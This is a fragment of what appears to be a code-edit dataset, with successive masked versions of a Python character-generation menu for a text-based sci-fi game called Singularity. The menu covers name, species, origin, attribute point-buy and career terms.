'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' % match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' % cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\n<mask token>\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\n<mask token>\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' % species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' % match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' % cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character['full_name']\n if not name:\n name = 'Not Set'\n species = caller.ndb._menutree.character['species']\n origin = caller.ndb._menutree.character['origin']\n if not origin:\n origin = 'Not Set'\n d_b = '|gOk|n' if _is_basics_done(caller)[0] else '|rNo|n'\n d_a = '|gOk|n' if _is_attributes_done(caller)[0] else '|rNo|n'\n d_s = '|gOk|n' if _is_skills_done(caller)[0] else '|rNo|n'\n d_l = '|gOk|n' if _is_life_done(caller)[0] else '|rNo|n'\n text = (\n \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\"\n % (name, species, origin, d_b, d_a, d_s, d_l))\n options = {'key': 'basics', 'goto': 'node_basics'}, {'key':\n 'attributes', 'goto': 'node_attributes'}, {'key': 'skills', 'goto':\n 'node_skills'}\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0\n ] and _is_skills_done(caller)[0]:\n options.append({'key': 'life path', 'goto': 'node_terms'})\n if _is_life_done(caller)[0]:\n options.append({'key': 'finish', 'goto': 'node_finish'})\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s['title'].lower().startswith\n (user_input.lower())), None)\n if not species:\n caller.msg(\n \"'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n\"\n % user_input)\n return\n species_chargen = next(s for s in CHARGEN['species'] if s['key'] ==\n species['key'])\n caller.msg(\"You set your character's species to: %s.\" % species[\n 'title'])\n character['age'] = species_chargen['min_age']\n character['origin'] = None\n character['species'] = species['key']\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character['species'] in o[\n 'species_restrictions'], CHARGEN['origins'])\n origin = next((o for o in origins if o['title'].lower().startswith(\n user_input.lower())), None)\n if not origin:\n caller.msg(\n \"'%s' is not a valid origin choice. Valid choices: %s\" % (\n user_input, list_to_string(map(lambda o: o['title'], origins)))\n )\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character['origin'] = origin['key']\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' % species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\n<mask token>\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' % match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' % cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\n<mask token>\n\n\ndef error(caller, msg):\n caller.msg('|y<|rError|y>|n %s' % msg)\n", "step-4": "<mask token>\n\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {'attributes': 20, 'skills': 20}\n caller.ndb._menutree.character = {'home_planet': None, 'full_name':\n None, 'origin': None, 'stats': {}, 'age': 16, 'is_psionic': False,\n 'current_term': 0, 'species': 'human'}\n caller.ndb._menutree.terms = []\n for attribute in AttributeEnum:\n caller.ndb._menutree.character['stats'][attribute.name] = 20\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n return text, {'key': 'begin', 'goto': 'node_menu'}\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character['full_name']\n if not name:\n name = 'Not Set'\n species = caller.ndb._menutree.character['species']\n origin = caller.ndb._menutree.character['origin']\n if not origin:\n origin = 'Not Set'\n d_b = '|gOk|n' if _is_basics_done(caller)[0] else '|rNo|n'\n d_a = '|gOk|n' if _is_attributes_done(caller)[0] else '|rNo|n'\n d_s = '|gOk|n' if _is_skills_done(caller)[0] else '|rNo|n'\n d_l = '|gOk|n' if _is_life_done(caller)[0] else '|rNo|n'\n text = (\n \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\"\n % (name, species, origin, d_b, d_a, d_s, d_l))\n options = {'key': 'basics', 'goto': 'node_basics'}, {'key':\n 'attributes', 'goto': 'node_attributes'}, {'key': 'skills', 'goto':\n 'node_skills'}\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0\n ] and _is_skills_done(caller)[0]:\n options.append({'key': 'life path', 'goto': 'node_terms'})\n if _is_life_done(caller)[0]:\n options.append({'key': 'finish', 'goto': 'node_finish'})\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name:\n name = 'Not Set'\n species = character['species']\n origin = character['origin']\n if not origin:\n origin = 'Not Set'\n age = character['age']\n text = (\n \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\"\n % (name, age, species, origin))\n options = {'key': 'return', 'goto': 'node_menu'}, {'key': 'full_name',\n 'goto': _node_basics_full_name}, {'key': 'age', 'goto':\n _node_basics_age}, {'key': 'species', 'goto': _node_basics_species}, {\n 'key': 'origin', 'goto': _node_basics_origin}\n return text, options\n\n\ndef _node_basics_full_name(caller):\n\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character['full_name'] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN['species'] if s['key'] == caller.\n ndb._menutree.character['species'])\n if not user_input.is_integer() or int(user_input) < species[\n 'min_start_age'] or int(user_input) > species['max_start_age']:\n caller.msg('Age must be a valid number between %s and %s.' % (\n species['min_start_age'], species['max_start_age']))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character['age'] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s['title'].lower().startswith\n (user_input.lower())), None)\n if not species:\n caller.msg(\n \"'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n\"\n % user_input)\n return\n species_chargen = next(s for s in CHARGEN['species'] if s['key'] ==\n species['key'])\n caller.msg(\"You set your character's species to: %s.\" % species[\n 'title'])\n character['age'] = species_chargen['min_age']\n character['origin'] = None\n character['species'] = species['key']\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character['species'] in o[\n 'species_restrictions'], CHARGEN['origins'])\n origin = next((o for o in origins if o['title'].lower().startswith(\n user_input.lower())), None)\n if not origin:\n caller.msg(\n \"'%s' is not a valid origin choice. Valid choices: %s\" % (\n user_input, list_to_string(map(lambda o: o['title'], origins)))\n )\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character['origin'] = origin['key']\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points['attributes'] != 0:\n return False, 'All attribute points must be allocated.'\n return True, ''\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character['full_name']\n if not name or len(name) < 3:\n return (False,\n 'Full name must have a value and be longer than 3 characters.')\n origin = character['origin']\n if not origin:\n return False, 'Must select an origin.'\n species_stats = next(s for s in CHARGEN['species'] if s['key'] ==\n character['species'])\n age = character['age']\n if age < species_stats['min_start_age']:\n return False, 'Age must be equal to or more than %s.' % species_stats[\n 'min_start_age']\n if age > species_stats['max_start_age']:\n return False, 'Age must be equal to or less than %s.' % species_stats[\n 'max_start_age']\n return True, ''\n\n\ndef _is_skills_done(caller):\n return False, ''\n\n\ndef _is_life_done(caller):\n return False, ''\n\n\n<mask token>\n\n\ndef node_attributes(caller):\n text = ''\n for attribute in AttributeEnum:\n if (attribute == AttributeEnum.Psi and not caller.ndb._menutree.\n character['is_psionic']):\n continue\n text += '%s: ' % attribute.name\n text += '%s\\r\\n' % caller.ndb._menutree.character['stats'][attribute\n .name]\n text += '\\r\\n%s points remaining.\\r\\n' % caller.ndb._menutree.points[\n 'attributes']\n text += (\n '\\r\\nType \"|yadd <number> to <attribute>|n\" to adjust an attribute positively.'\n )\n text += (\n '\\r\\nType \"|ysub <number> from <attribute>|n\" to adjust an attribute negatively.'\n )\n options = {'key': '_default', 'goto': _node_attributes}, {'key':\n 'return', 'goto': 'node_menu'}\n return text, options\n\n\ndef _node_attributes(caller, raw_string):\n match = re.match('add (\\\\d+) to (\\\\w+)', raw_string)\n if match:\n return adjust_attribute(caller, match, True)\n match = re.match('sub (\\\\d+) from (\\\\w+)', raw_string)\n if match:\n return adjust_attribute(caller, match, False)\n if not match:\n return 'node_attributes'\n\n\ndef node_terms(caller):\n text = ''\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += '\\r\\n* Term %s:' % term_count + ' %s' % term.title\n term_count += 1\n age = caller.ndb._menutree.character['age'\n ] + 4 * caller.ndb._menutree.character['current_term']\n text += '\\r\\nCurrent Character Age: %s' % age\n text += '\\r\\n\\r\\nType \"|ychoose <term>|n\" to begin a term.'\n options = {'key': '_default', 'goto': _node_terms}, {'key':\n 'list choices', 'goto': _list_term_choices}, {'key': 'finish',\n 'goto': 'node_finish'}\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match('choose (\\\\w+)', raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return 'node_terms'\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x['title'].lower().startswith(\n term_token)), None)\n if not term:\n error(caller,\n '%s is not a valid term. Type \"|ylist choices|n\" to get a list of all available careers.'\n )\n return 'node_terms'\n caller.ndb._menutree.terms.append({'term': term['title']})\n return 'node_term'\n\n\n<mask token>\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1\n ]['term']\n text = 'Career: %s' % term_title\n text += '\\r\\nAssignment: Not Set'\n text += '\\r\\nPersonal Advancement: Not Set'\n text += '\\r\\nYears: %s' % caller.ndb._menutree.character['age']\n text += '-%s' % (caller.ndb._menutree.character['age'] + 4)\n text += '\\r\\n\\r\\nLife Event: |y1 Available|n'\n text += (\n '\\r\\n\\r\\nType \"|yset Assignment to <assignment>|n\" to choose an assignment.'\n )\n text += (\n '\\r\\nType \"|yset Advancement to <option>|n\" to choose a personal advancement.'\n )\n text += (\n '\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. '\n )\n text += (\n \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n )\n options = {'key': 'show assignments', 'goto': _list_term_assignments}, {\n 'key': 'show advancements', 'goto': _list_term_advancements}, {'key':\n 'roll life event', 'goto': _do_life_event}\n return text, options\n\n\ndef _list_term_advancements(caller):\n return 'node_term'\n\n\n<mask token>\n\n\ndef _do_life_event(caller):\n return 'node_term'\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith\n (attribute_token)), None)\n if not attribute:\n error(caller, '%s is not a valid attribute.' % match.group(2))\n return 'node_attributes'\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, 'Value to adjust must be a positive number.')\n return 'node_attributes'\n attribute_value = caller.ndb._menutree.character['stats'][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + ' cannot be reduced below 10.')\n return 